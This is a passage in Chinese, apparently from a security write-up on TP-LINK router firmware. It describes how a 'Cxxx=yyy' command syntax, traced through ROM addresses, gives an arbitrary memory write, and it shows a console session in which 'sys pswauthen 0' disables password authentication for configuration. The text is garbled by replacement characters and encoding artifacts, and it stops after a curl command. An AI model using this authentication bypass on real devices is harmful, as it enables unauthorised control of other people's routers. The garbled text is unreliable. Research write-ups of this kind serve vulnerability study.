令人興奮的是���,這正是[2]中所提及的代碼���。在ROM:8010E5F0中,看起來Cxxx=yyy語法會被解釋成xxx乘以0×28再將結果加上ROM:8010E5F8中所示的基址���,然后使用這個新地址作為目的地址復制yyy的值(ROM:8010E608)���。因此���,這可以讓我們實現(xiàn)任意寫。從另外一方面來說���,這有可能能讓我們以”sys pwauthen 0”的形式”解鎖”路由���,如下所示:
cawan$curl 192.168.1.1
ProtectedObject ProtectedObject
Username or Password error
TP-LINK>sys pswauthen 0
Do notneed password authentication for configuration!
TP-LINK>
cawan$curl 192.168.1.1
